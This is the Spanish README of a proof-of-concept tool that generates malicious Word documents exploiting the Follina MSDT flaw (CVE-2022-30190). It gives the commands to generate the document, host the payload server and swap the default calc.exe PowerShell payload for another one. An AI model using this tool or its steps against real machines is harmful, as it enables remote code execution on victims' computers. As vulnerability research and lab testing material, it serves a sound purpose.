
MS-MSDT Follina CVE-2022-30190 generador de documentos PoC
Generador de docx malicioso para explotar (Ejecución remota de código en Microsoft Office Word)
La creación de este script se basa en CVE-2021-40444 PoC de LockedByte y en el informe de Tothi
Primero modifica backup.html y reemplaza el payload de PowerShell. Ahora mismo solo abre una calc.exe usando IEX('calc.exe').
python3 exploit.py generate http://<SRV IP>

Una vez que generes el docx malicioso (estará en out/), puedes configurar el servidor:
sudo python3 exploit.py host 80

Finalmente, prueba el docx en una máquina virtual de Windows:
